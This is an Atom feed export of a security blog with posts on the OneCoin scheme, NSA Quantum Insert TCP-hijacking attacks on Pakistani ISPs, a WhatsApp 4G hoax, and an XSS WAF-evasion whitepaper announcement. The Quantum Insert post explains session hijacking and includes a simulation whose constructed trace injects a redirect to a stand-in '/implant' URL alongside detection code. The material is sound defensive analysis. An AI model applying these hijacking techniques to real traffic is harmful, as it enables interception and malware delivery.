tag:blogger.com,1999:blog-31212701990897590622024-02-07T22:27:38.762-08:00Ethical Hacking - RafayhackingarticlesRafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.comBlogger261125tag:blogger.com,1999:blog-3121270199089759062.post-86558813884974214682017-05-02T01:34:00.001-07:002020-05-27T14:20:31.175-07:00Is OneCoin A Scam? - Technical Analysis <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<b>TL;DR: stay away from any kind of pyramid scheme, especially one built around a cryptocurrency.</b><br />
<br />
OneCoin is a cryptocurrency that has widely been dubbed a Ponzi scheme, and the evidence surrounding it is considerable. The way it works is that members buy training packages that come with "tokens", and these tokens can be placed into mining. Once mining has completed, OneCoins are credited to the member's account; the amount depends upon the number of tokens placed as well as on the stated difficulty of the problem being solved.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwA8PSwcj_tFtrtswOOok8Gc-_kIl89MGYLeBZpfo3qdfV2N3C0En9iqmxg6Tyn4Glu52feWndOHSPIptfi0iSCMRKPWmCSku91lxqDYkS3Tj5sKfwdGmRq2SnHw3h3RMwkBCrZqg1LuI/s1600/maxresdefault.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwA8PSwcj_tFtrtswOOok8Gc-_kIl89MGYLeBZpfo3qdfV2N3C0En9iqmxg6Tyn4Glu52feWndOHSPIptfi0iSCMRKPWmCSku91lxqDYkS3Tj5sKfwdGmRq2SnHw3h3RMwkBCrZqg1LuI/s640/maxresdefault.jpg" width="640" /></a></div>
<br />
<a name='more'></a>The following are a few of the concerns raised by the crypto community surrounding OneCoin:<br />
<h2>
Concerns Over OneCoin CryptoCurrency</h2>
<b>i)</b> OneCoin is based upon a private blockchain. A private blockchain is centralized within one organization, and only that organization has write permission to it, as opposed to a public blockchain, which anyone can read from and (by submitting transactions or mining blocks) write to.<br />
<br />
Even in a private blockchain, however, read permission can be made public, which would allow anyone to view the transactions. Despite claiming that their business model is transparent, they have opted for a private blockchain.<br />
<br />
<b>ii)</b> Cryptocurrencies (Bitcoin in particular) solve a common problem, i.e. how to inject new currency into the system without causing inflation. The process of creating new coins is referred to as mining, which generally involves solving a computational puzzle (proof of work) whose difficulty is adjusted upwards as more and more computing power is thrown at it.<br />
<br />
This is done by utilizing processing power (CPUs originally; GPUs and ASICs today) to solve these puzzles. For OneCoin there is no public evidence of how mining takes place: neither the algorithm, nor the difficulty, nor the servers that are supposedly doing the mining are known.<br />
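What point (ii) asks for, and what cannot be checked for OneCoin, is a publicly verifiable mining process. The following toy proof-of-work miner is an added example (it is not OneCoin's, Bitcoin's or the author's code): the header layout, the difficulty-in-bits representation and the simplified retarget rule are assumptions for illustration, and the inputs are constructed. It shows the asymmetry that makes public mining auditable: finding a nonce costs about 2^difficulty hashes, checking a claimed one costs a single hash, so anybody holding the block header can verify it without trusting the issuer.<br />

```python
"""Toy proof-of-work: what publicly verifiable mining looks like (added example)."""
import hashlib
import struct

MAX_TARGET = 1 << 256   # size of the SHA-256 output space; a target is a slice of it


def block_hash(prev_hash: bytes, payload: bytes, nonce: int) -> bytes:
    """Double SHA-256 over prev_hash || payload || nonce (Bitcoin-style commitment).
    The layout is an assumption chosen for the example."""
    header = prev_hash + payload + struct.pack("<Q", nonce)
    return hashlib.sha256(hashlib.sha256(header).digest()).digest()


def target_for(difficulty_bits: int) -> int:
    """A block is valid when its hash, read as a big-endian integer, is below this target.
    Each extra bit of difficulty halves the target and doubles the expected work."""
    return MAX_TARGET >> difficulty_bits


def mine(prev_hash: bytes, payload: bytes, difficulty_bits: int,
         max_nonce: int = 1 << 32) -> int:
    """Brute-force a nonce that satisfies the target. Expected cost: 2**difficulty_bits hashes."""
    target = target_for(difficulty_bits)
    for nonce in range(max_nonce):
        if int.from_bytes(block_hash(prev_hash, payload, nonce), "big") < target:
            return nonce
    raise RuntimeError("nonce space exhausted")


def verify(prev_hash: bytes, payload: bytes, nonce: int, difficulty_bits: int) -> bool:
    """One hash is all a verifier needs; no trust in the miner is required."""
    digest = block_hash(prev_hash, payload, nonce)
    return int.from_bytes(digest, "big") < target_for(difficulty_bits)


def retarget(target: int, actual_span: int, expected_span: int) -> int:
    """Difficulty adjustment in the style of Bitcoin's periodic retarget: scale the
    target by how long the last period actually took versus the schedule, clamped to
    a factor of four per period. Faster blocks (more hash power) -> smaller target."""
    actual_span = max(expected_span // 4, min(expected_span * 4, actual_span))
    return min(MAX_TARGET - 1, target * actual_span // expected_span)


if __name__ == "__main__":
    prev = bytes(32)                       # constructed: all-zero previous hash
    data = b"alice->bob:5 onecoin?"        # constructed payload
    bits = 16
    nonce = mine(prev, data, bits)
    print("nonce", nonce, "valid:", verify(prev, data, nonce, bits))
    print("tampered payload valid:", verify(prev, data + b"!", nonce, bits))
```

With difficulty raised by one bit the expected work doubles; retarget() lowers the target when blocks arrive faster than scheduled, which is how difficulty grows as more people try to solve the puzzle. Bitcoin itself retargets every 2016 blocks with the same clamp to a factor of four.<br />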
<br />
<b>iii)</b> Almost all other cryptocurrencies such as Litecoin, Namecoin, Dogecoin, Dashcoin, Ethereum etc. can be traded against each other on various exchanges such as Bitfinex, Poloniex, BTC-e etc. For OneCoin you will not find a single independent exchange that allows you to trade it against any of these cryptocurrencies.<br />
<br />
<b>iv)</b> Several similar MLM (Multi-Level Marketing) cryptocurrencies have been busted and exposed in the past; one example I can quote is USFIA's Gemcoin, a Ponzi scheme of approximately 32 million dollars. OneCoin is based upon the same affiliate-marketing concept. <br />
<br />
<b>v)</b> Several financial watchdogs, such as the UK's Financial Conduct Authority and Germany's Federal Financial Supervisory Authority (BaFin), have already warned against OneCoin.<br />
<br />
<b>vi) </b>Several countries have started a crackdown against OneCoin and have seized accounts belonging to OneCoin payment processors. These countries include India, Thailand, Bangladesh, Germany etc.<br />
<br />
To invest or not is, however, a decision that I leave to you. </div>
</div>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-74283385581011472572017-04-11T10:43:00.000-07:002020-05-27T14:20:14.218-07:00How Pakistan's Critical Infrastructure Was Hacked? - Technical Analysis<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBBw07lo_zNu4v-HZ5sJIeswM0pjZ1A0TbZrN9R7MNs0ZPp3K14PRMil1r3fTSby9rNPhdfsmjVTDFMoqKFgtfK1GiRMYurkjLUcDtk9H8y5zSB2ewl1T7Jc2qMx9mT95nTNQV2W1BU8s/s1600/NSA_surveillance.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBBw07lo_zNu4v-HZ5sJIeswM0pjZ1A0TbZrN9R7MNs0ZPp3K14PRMil1r3fTSby9rNPhdfsmjVTDFMoqKFgtfK1GiRMYurkjLUcDtk9H8y5zSB2ewl1T7Jc2qMx9mT95nTNQV2W1BU8s/s400/NSA_surveillance.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
There have been multiple reports leaked from various sources about the NSA hacking into Pakistan's Internet infrastructure, ranging from core routers to the Pakistan Telecommunication Green Line communication network, in order to intercept the communications of Pakistan's civilian and military leadership. In October last year, a group called "<b>Shadow Brokers</b>" leaked a comprehensive list of servers that were hacked as part of NSA operations. The list revealed that several hosts of Multinet (<b>mpkhi-bk.multi.net.pk, ns1.multi.net.pk</b>) were compromised, as well as Micronet (<b>tx.micro.net.pk</b>), now part of Nayatel.<br />
<br />
<a name='more'></a>There may be various motives for the NSA hacking into Pakistan's Internet infrastructure; intercepting and monitoring traffic may be one of them. However, there is more to it. Various leaks from Edward Snowden reveal a couple of the NSA's deadliest weapons, the most notable being Quantum Insert attacks. One of the leaked <a href="https://www.documentcloud.org/documents/3031642-SSO-News-Excerpt-Redacted.html" rel="nofollow" target="_blank">documents </a>confirms that this attack was utilized to infect a target located in Miran Shah.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcnMtq-oeIRjNVcrqss2wbW5dokgVzB_VhOcCalUf3I7lZZUnYrwr-fAkAc6egn6bY7u3UfBbmPF7xOsGrmw8LFRbMkkWbI1ZvbpoQlboJR2jWfiGgq8zdQ7-nmCqXhlWl-M9j6dKzqLk/s1600/207966b3-676e-4e1c-bf62-fc6361091992+%25281%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcnMtq-oeIRjNVcrqss2wbW5dokgVzB_VhOcCalUf3I7lZZUnYrwr-fAkAc6egn6bY7u3UfBbmPF7xOsGrmw8LFRbMkkWbI1ZvbpoQlboJR2jWfiGgq8zdQ7-nmCqXhlWl-M9j6dKzqLk/s640/207966b3-676e-4e1c-bf62-fc6361091992+%25281%2529.jpg" width="640" /></a></div>
<br />
<h2>
Quantum Insert Attacks</h2>
Quantum Insert attacks are an example of man-on-the-side attacks, which require precise positioning of the attacker's rogue servers (monitors/shooters) in order to win a race against the legitimate server to deliver malicious content. The success probability of this attack relies upon the placement of those servers: the closer the malicious servers are to the target, the better their chance of winning the race against the legitimate servers.<br />
<u><br /></u>
<u>For instance, if a user based in Pakistan browses Facebook.com, PTCL or Multinet, being the ISP, is topologically much closer to the target than the legitimate Facebook servers and therefore has a higher probability of winning the race and delivering the malicious content. This happens to be one of the major reasons why the NSA hacked into Pakistan's ISPs: to be closer to the target and thus increase the probability of a successful attack.</u><br />
<div>
<br /></div>
<h2>
How Quantum Insert Attack Works?</h2>
Quantum Insert attacks are not new; they are a type of TCP hijacking attack that has existed in one form or another for a long time. In order to understand TCP hijacking, we first have to understand how the three-way handshake works.<br />
<br />
TCP, being a connection-oriented protocol, requires sender and receiver to establish a connection with a three-way handshake. If you type Facebook.com in your browser, one of the first steps the browser takes is a DNS query to find the IP address associated with Facebook.com; suppose the query returns <b>66.220.159.121</b>. The client then performs a TCP three-way handshake with the server at <b>66.220.159.121</b>.<br />
<br />
The following diagram illustrates how TCP/IP three-way handshake works:<br />
<div>
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55IJO0mRMaxQA9j-Pjd1AWlmQbqgncocRr9QtvaB8qNUGthg2xflrh-xcJfGMZ0Ui9o0dOFi4F279b55iDM3b6JMsNFZ0nzeiU9MvZXOh6aNT4Svmzy1u9SRTzFZh6xoblS_CiRmzeak/s1600/17888354_1685307348151135_1223176672_n+-+Copy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55IJO0mRMaxQA9j-Pjd1AWlmQbqgncocRr9QtvaB8qNUGthg2xflrh-xcJfGMZ0Ui9o0dOFi4F279b55iDM3b6JMsNFZ0nzeiU9MvZXOh6aNT4Svmzy1u9SRTzFZh6xoblS_CiRmzeak/s640/17888354_1685307348151135_1223176672_n+-+Copy.jpg" width="640" /></a></div>
<span style="font-weight: bold;"><br /></span>
<span style="font-weight: bold;"></span><br />
<div style="text-align: center;">
<b><span style="font-size: xx-small;">ref:http://ipcisco.com/wp-content/uploads/TCPHeader/7_3wayhandshake_requestdata.jpg</span></b><br />
<div>
<b><span style="font-size: xx-small;"><br /></span></b></div>
</div>
</div>
<div style="text-align: center;">
<span style="font-weight: bold;"><br /></span></div>
<div style="text-align: left;">
<b>i) Host A</b> sends a segment with the SYN flag set, along with a randomly generated ISN (Initial Sequence Number), here <b>1293906975</b>, and ACK=0.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>ii)</b> Host B, upon receiving the SYN, responds with SYN+ACK carrying its own random ISN <b>3455719727</b>, and acknowledges Host A's ISN plus one: <b>ACK=1293906976</b>.</div>
<div style="text-align: left;">
<b><br /></b></div>
<div style="text-align: left;">
<b>iii) </b>Host A finally completes the three-way handshake by sending an ACK that acknowledges Host B's ISN plus one (ACK=3455719728).</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
From the above process, it is evident that to establish the three-way handshake both client and server generate a random 32-bit sequence number, from which they start counting the bytes they transmit.<br />
<br />
Host B will only accept segments from Host A that carry the correct SEQ/ACK numbers. If an attacker obtains the sequence numbers in use for a session, they can craft TCP segments containing the expected sequence number and, using a spoofed source IP address, make the receiving system believe that the segments came from the legitimate host. This is known as <b>TCP hijacking</b>.<br />
<br />
When the legitimate segment arrives afterwards, it is discarded as a duplicate, because it carries a sequence number the receiver has already accepted. One critical condition for success is that the response from the malicious server must arrive before the legitimate response from the web server; this is exactly why the placement of the malicious server is critical to the attack. From the document mentioned above, the success ratio for the malicious response arriving before the legitimate one against targets in Pakistan was approximately <b>48%</b>.<br />
<br /></div>
<div style="height: 0; padding-bottom: 65%; position: relative;">
<iframe allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/ZG5FMDUWVoA?ecver=2" style="height: 100%; left: 0; position: absolute; width: 100%;" width="554"></iframe></div>
<br />
From the above demonstration by Fox-IT, it is clear that a Quantum Insert attack requires two crucial components. The first is the monitor, which sits passively, collects session information (addresses, ports, sequence and acknowledgement numbers) and feeds it to the shooter. The shooter then uses those sequence/ACK numbers to hijack the session and tries to inject malicious content into the TCP stream before the legitimate response arrives.<br />
<br />
As discussed before, the placement of the monitor/shooter is crucial, as they have to be near the target; this is one of the major reasons why the NSA is particularly interested in compromising ISPs: better placement of their monitor/shooter to win the race against legitimate web servers and inject malicious content.<br />
<div>
<br /></div>
<h2>
Putting Pieces Together</h2>
<b>1.</b> The NSA hacks into various Internet Service Providers in order to deploy passive traffic-collection sensors, or monitors, around the Internet backbone.<br />
<b><br /></b>
<b>2. </b>The huge amount of collected data is then fed to analysis and correlation engines such as <b>XKEYSCORE</b>.<br />
<br />
<b>3. </b>Based upon the analysis in tools such as <b>XKEYSCORE</b>, a target profile is built, for instance "all Tor/VPN users in a certain area" or "all PGP usage in Iran". XKEYSCORE can also be queried for the most frequent web searches and the most frequently visited (HTTP) websites.<br />
<br />
<b>4. </b>Once the target has been selected and the attack conditions identified (for instance, all users based in F-8 Islamabad browsing <b>http://www.torproject.org/</b>), the conditions are fed to the monitors. As soon as they are met, the monitor passes the session information to the shooter, which performs the Quantum Insert: it injects a malicious HTTP response for <b>http://www.torproject.org/</b> before the real response arrives.<br />
<br />
<b>5. </b>Once the target is compromised, the post-exploitation phase begins, aimed at collecting information as well as moving laterally inside the network. <br />
<br />
<h2>
Detection & Defenses </h2>
<b>1.</b> It is to be noted that <b>HTTPS</b> along with <b>HSTS (HTTP Strict Transport Security)</b> would largely defeat this attack: an injected segment cannot carry a valid TLS record for the session, and HSTS stops the browser from ever issuing the plaintext HTTP request that the shooter needs to answer (plain HTTPS without HSTS still leaves the first unencrypted request, or any http:// link, open to injection). An IPsec VPN would also prevent this attack, as it encrypts and authenticates the transport- and application-layer payload between the client and the VPN gateway, so a shooter at the ISP sees only ESP packets and can neither learn sequence numbers nor forge acceptable segments.<br />
<br />
<b>2. </b>Another way to detect this attack is to check the TTL (Time To Live) value of the IP packets. The sender sets an initial TTL that is decremented by each hop. Since the monitor/shooter sits much closer to the target than the real server, fewer routers decrement the spoofed packet's TTL, so it normally arrives with a different TTL from the legitimate packets of the same flow (typically a higher one, assuming the same initial value). A shooter can choose its initial TTL to blend in, so a TTL change inside an established flow is a heuristic, not proof.<br />
<b><br /></b>
<b>3.</b> Since both the legitimate and the injected segment arrive with the same sequence number but different payloads, an IDS/IPS signature can keep track of data-bearing segments per flow and alert when the same sequence number is seen twice with differing content (pure ACKs legitimately share a sequence number with the first data segment that follows them, so only segments with payload should be compared).<br />
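To tie the mechanism described under "How Quantum Insert Attack Works?" to detections 2 and 3 above, here is an added example in Python (it is not code from this post, from Fox-IT or from the leaked documents): a hand-constructed packet trace of the race, a minimal in-order receiver showing why only the first segment for a sequence number counts, and a passive detector that raises the two signals an IDS can see. The addresses, ports, TTLs and payloads are constructed; the ISNs are the ones used in the handshake walkthrough above.<br />

```python
"""Quantum Insert race and its passive detection on a constructed trace (added example)."""
from dataclasses import dataclass
from typing import List, Tuple

Flow = Tuple[str, int, str, int]


@dataclass(frozen=True)
class Segment:
    """Minimal view of one TCP segment: addressing, sequence number, IP TTL, payload."""
    src: str
    sport: int
    dst: str
    dport: int
    seq: int
    ttl: int
    payload: bytes

    @property
    def flow(self) -> Flow:
        return (self.src, self.sport, self.dst, self.dport)


def reassemble_stream(segments: List[Segment], flow: Flow, first_data_seq: int) -> bytes:
    """Deliver what a strictly in-order receiver hands to the application.

    A data segment is accepted only when its seq is the next expected byte; a
    lower seq is an already-received duplicate and is dropped. That is the whole
    race: whichever answer lands first owns that sequence number.
    first_data_seq is ISN + 1 because the SYN itself consumes one sequence number.
    """
    expected, out = first_data_seq, b""
    for s in segments:
        if s.flow != flow or not s.payload:
            continue
        if s.seq == expected:
            out += s.payload
            expected += len(s.payload)
        # seq < expected: duplicate, dropped. seq > expected: a real stack would
        # buffer it out of order; this toy receiver simply ignores it.
    return out


def detect_injection(segments: List[Segment], ttl_tolerance: int = 0) -> List[tuple]:
    """Passive IDS logic: return (flow, seq, reason) alerts for a trace.

    * Same (flow, seq) seen with two different payloads: two hosts answered the
      same request, the shooter and the real server. Only data-bearing segments
      are compared, since a pure ACK legitimately shares its seq with the first
      data segment that follows it.
    * TTL differs from the first TTL seen on the flow (the SYN-ACK) by more than
      ttl_tolerance hops: a sender at a different distance. A shooter near the
      victim normally leaves a higher remaining TTL, but it can pick its initial
      TTL to blend in, so this signal is a heuristic only.
    """
    first_payload = {}   # (flow, seq) -> payload of the first data segment with that seq
    base_ttl = {}        # flow -> TTL of the first segment seen on that flow
    alerts = []
    for s in segments:
        if s.payload:
            key = (s.flow, s.seq)
            if key in first_payload and first_payload[key] != s.payload:
                alerts.append((s.flow, s.seq, "duplicate seq with different payload"))
            first_payload.setdefault(key, s.payload)
        if s.flow not in base_ttl:
            base_ttl[s.flow] = s.ttl
        elif abs(base_ttl[s.flow] - s.ttl) > ttl_tolerance:
            alerts.append((s.flow, s.seq, f"ttl changed {base_ttl[s.flow]} -> {s.ttl}"))
    return alerts


# Constructed trace: addresses, TTLs and payloads are made up; the ISNs are the
# ones from the handshake walkthrough in the post.
CLIENT = ("10.0.0.5", 40000)
SERVER = ("66.220.159.121", 80)
CLIENT_ISN, SERVER_ISN = 1293906975, 3455719727
CLIENT_TO_SERVER: Flow = (*CLIENT, *SERVER)
SERVER_TO_CLIENT: Flow = (*SERVER, *CLIENT)

REQUEST = b"GET / HTTP/1.1\r\nHost: www.facebook.com\r\n\r\n"
REAL_PAYLOAD = b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok"
INJECTED_PAYLOAD = b"HTTP/1.1 302 Found\r\nLocation: http://203.0.113.9/implant\r\n\r\n"

TRACE = [
    Segment(*CLIENT_TO_SERVER, seq=CLIENT_ISN, ttl=64, payload=b""),          # SYN
    Segment(*SERVER_TO_CLIENT, seq=SERVER_ISN, ttl=52, payload=b""),          # SYN-ACK, 12 hops away
    Segment(*CLIENT_TO_SERVER, seq=CLIENT_ISN + 1, ttl=64, payload=b""),      # ACK
    Segment(*CLIENT_TO_SERVER, seq=CLIENT_ISN + 1, ttl=64, payload=REQUEST),  # what the monitor sees
    Segment(*SERVER_TO_CLIENT, seq=SERVER_ISN + 1, ttl=58, payload=INJECTED_PAYLOAD),  # shooter, 6 hops away
    Segment(*SERVER_TO_CLIENT, seq=SERVER_ISN + 1, ttl=52, payload=REAL_PAYLOAD),      # real server, too late
]

if __name__ == "__main__":
    print("browser received:", reassemble_stream(TRACE, SERVER_TO_CLIENT, SERVER_ISN + 1))
    for alert in detect_injection(TRACE):
        print("ALERT", alert)
```

Swap the order of the last two segments and the reassembler returns the real server's response instead; that is the 48% race in miniature. The duplicate-sequence alert fires on whichever of the two arrives second, so an analyst should pull both segments for that sequence number rather than assume the flagged one is the forgery.<br />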
<br /></div>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-799732511771374472016-09-06T03:21:00.003-07:002020-05-27T14:20:50.349-07:00Whatsapp 4G VIP SCAM - Technical Analysis
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglHALVxsJv4K20JD14ap0V-JuwIdD0bkavMQB1cVnUvQFNAHvCAwatvUWcgKJNtZ568P-itOof8ocMOzz2pO8m1VFmIzuaQy7XMLjaMyRvlAOw42shiS6OZy_CIDwm4do3yNdahIsywlI/s1600/123.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="467" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglHALVxsJv4K20JD14ap0V-JuwIdD0bkavMQB1cVnUvQFNAHvCAwatvUWcgKJNtZ568P-itOof8ocMOzz2pO8m1VFmIzuaQy7XMLjaMyRvlAOw42shiS6OZy_CIDwm4do3yNdahIsywlI/s640/123.png" width="640" /></a></div>
<br />
This is a short blog post about a recent hoax concerning a "WhatsApp 4G" version. I would like to clearly highlight that there is no such application as '<b>WhatsApp 4G</b>'. The fake version promises users unrealistic features: video calling, new WhatsApp themes, deleting sent messages from both sides etc.<br />
<a name='more'></a><br />
The following is how the message is being propagated:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD2RoDZqqcbLmILMiDL53FuXyX-S81upowGZ3UogAlChLwHYu4S5fkNSc6-6pvCb8vQbO34hYgBb6xEU1eYbOjOyZZNwCiZQQjTZGHODBHlY8W5nm2Z6br8oZS16iGucSBhzDt8RrxVAE/s1600/123.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD2RoDZqqcbLmILMiDL53FuXyX-S81upowGZ3UogAlChLwHYu4S5fkNSc6-6pvCb8vQbO34hYgBb6xEU1eYbOjOyZZNwCiZQQjTZGHODBHlY8W5nm2Z6br8oZS16iGucSBhzDt8RrxVAE/s400/123.png" width="400" /></a></div>
<br />
<h2>
Technical Analysis </h2>
Upon visiting the link you are taken to a page where you are asked to invite 15 friends before you can download the version. Clicking the invite button uses the WhatsApp URL scheme (<b>whatsapp://</b>) to send the message to your contacts, so you end up promoting the hoax on behalf of the scammers:<br />
<br />
The entire business logic is based upon the following client-side script - <b><u>http://new-4g-whatsapp.ga/invite.js</u>.</b><br />
<div>
<br /></div>
<div>
Upon examining invite.js it was discovered that the code sets a cookie and checks, entirely on the client side, whether 15 invites have been sent: </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrl1s_WLEpGVHvqC77-UeaqmmG5AUeobthX0sv7v4AT8WsEZ1YdAsIX-H_q0mAtsmWu0kyoMoZPKGJ6bpeAbWVElHb92xoXd3pMdoKkJ8oyjAOMywdUDGbhenRaraJhlpr37okKGa-lEI/s1600/1234.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrl1s_WLEpGVHvqC77-UeaqmmG5AUeobthX0sv7v4AT8WsEZ1YdAsIX-H_q0mAtsmWu0kyoMoZPKGJ6bpeAbWVElHb92xoXd3pMdoKkJ8oyjAOMywdUDGbhenRaraJhlpr37okKGa-lEI/s640/1234.png" width="640" /></a></div>
<br />
<br />
Once the counter has reached 15 invites or more, you are redirected to the download link:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy0WHbPnRjG-982_nnPF-ZH2BQ9h0xoKk-rniN0ghKmTODt7e1O-RDntCfnyoLm9ufwMLJ2qTDY3SFWD-SGqVj1sKRB_W5et-MxcgLvJ0ri2Xf-qn13AFWSLUVD1hByACwHCbyMJbS2_g/s1600/whatsappp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy0WHbPnRjG-982_nnPF-ZH2BQ9h0xoKk-rniN0ghKmTODt7e1O-RDntCfnyoLm9ufwMLJ2qTDY3SFWD-SGqVj1sKRB_W5et-MxcgLvJ0ri2Xf-qn13AFWSLUVD1hByACwHCbyMJbS2_g/s640/whatsappp.png" width="640" /></a></div>
From the above source code, if the value of <b>c </b>is greater than or equal to <b>15</b>, window.location.href is set to the <b>ur</b> variable, which holds the following download link - <b><u>http://ta3.co/new-4G-whatsapp/install.php</u></b>. Because the counter lives in a cookie on the visitor's own device, the check itself is trivially bypassed by editing the cookie; the invites already sent out in the meantime are what the scammers are after.<br />
<br />
The installation link seems to be dead. Normally in such scams you are asked to fill in surveys or install *free apps* which are not really free, as they may be bundled with malware/adware.<br />
<b><br /></b>
<br />
<h2>
Update (Whatsapp Gold)</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGox1H6BP00Art9q2satZNBOeqackwBfcBBXXahDZzdv5tt4X-7c06l48g7B2CCW397pDRzUZm-Eh5g1iXRPlg70EiZpJQf6YkXM8QUP5lEWHERTZCIQEmNHjtg9UiEGubqqNgxQ39B2U/s1600/IMG_20160906_222448954.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="444" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGox1H6BP00Art9q2satZNBOeqackwBfcBBXXahDZzdv5tt4X-7c06l48g7B2CCW397pDRzUZm-Eh5g1iXRPlg70EiZpJQf6YkXM8QUP5lEWHERTZCIQEmNHjtg9UiEGubqqNgxQ39B2U/s640/IMG_20160906_222448954.jpg" width="640" /></a></div>
<br />
A new variation of the WhatsApp 4G VIP scam has recently come to notice under the name <b>"WhatsApp Gold"</b>, which works on the same principle as above. The only things that have changed are the interface design and the name.</div>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-11345099982500652702016-09-01T03:07:00.000-07:002020-05-27T14:21:06.159-07:00Breaking The Great Wall of Web - XSS WAF Evasion CheatSheet<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbc2RdZYaOM6w8y7DoWxzZc-LIIviCPwZAMD0L4fgYQ59w8Jo56XdAL8ZJRRQ9NvUvT1_qeqyqi5AwYuOyKGqdB3CNbRxDNGU4BS9V9sshIDUfXsy_6UoI_cLTWg8o5P9aqdbsD5obeh4/s1600/14017993_1098329660221427_1648848796_n.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbc2RdZYaOM6w8y7DoWxzZc-LIIviCPwZAMD0L4fgYQ59w8Jo56XdAL8ZJRRQ9NvUvT1_qeqyqi5AwYuOyKGqdB3CNbRxDNGU4BS9V9sshIDUfXsy_6UoI_cLTWg8o5P9aqdbsD5obeh4/s640/14017993_1098329660221427_1648848796_n.png" width="452" /></a></div>
<br />
I think it's mandatory to give back to the security community from which we learn cutting-edge techniques and information. Therefore, after months of effort, I am presenting to you a new whitepaper titled "<b><u>Breaking Great Wall of Web</u></b>", without any strings attached.<br />
<b><br /></b>
<br />
<h2>
Acknowledgements</h2>
I would like to thank the <a href="http://acunetix.com/">Acunetix Team</a> for helping to proof-read the document.
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.acunetix.com/" target="_blank"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDS4Nc_d-FPv0tSIA9Sc5sdUbKeJWGrtgQVIsrelzWlqf6HEAyqR3qgiot-Bu9ru3KF5SjGMFXtB8pvrGaeOt6DWLncko36-_CM2F9W1Zgiap3iT0jyIyfyEo_tlUXf9TyXJdyW3cADuk/s320/acunetix-big-logo.png" width="320" /></a></div>
<h2>
Background</h2>
<br />
<b><br /></b>
The whitepaper not only contains sophisticated XSS vectors but also explains the methodology behind bypassing a WAF. The previous paper on this subject, "<b><a href="http://www.rafayhackingarticles.net/2013/12/bypassing-modern-wafs-xss-filters-cheat.html" target="_blank">Bypassing Modern WAF's XSS Filters - Cheat Sheet</a>"</b>, was released 3 years back. A lot has changed and evolved during these years; in particular, newer ECMAScript features have opened a new horizon for evasion and obfuscation. I have already discussed and demonstrated several techniques presented in this whitepaper in my recent webcast hosted by the <b>Garage4hackers</b> team, "<a href="http://www.rafayhackingarticles.net/2016/05/bypassing-modern-wafs-exemplified-at-xss.html" target="_blank"><b>Bypassing Modern WAF's Exemplified At XSS</b></a>".<br />
<br />
<h2>
Abstract </h2>
<br />
<br />
